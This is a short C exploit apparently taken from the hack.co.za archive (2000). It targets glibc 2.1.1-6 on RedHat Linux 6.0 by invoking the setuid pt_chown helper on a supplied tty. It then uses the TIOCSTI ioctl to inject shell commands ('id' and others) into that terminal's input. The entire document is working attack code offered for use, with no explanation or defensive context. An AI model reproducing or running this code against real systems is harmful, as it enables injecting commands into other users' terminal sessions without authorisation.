/*
 *
 *        Linux  exploit
 *  GNU glibc 2.1.1-6 + RedHat Linux 6.0
 *
 */


int main(int a,char* b[])
{
  char* c="\nclear;echo huhuhu, it worked...;id;sleep 2\n";
  int i=0,x=open(b[1],1); // Expect writable, allocated
  // (eg. by screen) /dev/ttyXX as 1st arg

  if (x<0)
    {
      perror(b[1]);
      exit(1);
    }

  if (!fork())
    {
      dup2(x,3);
      execl("/usr/libexec/pt_chown","pt_chown",0);
      perror("pt_chown");
      exit(1);
    }
  sleep(1);
  for (i;i<strlen(c);i++) ioctl(x,0x5412,&c[i]);
}
/*                    www.hack.co.za              [2000]*/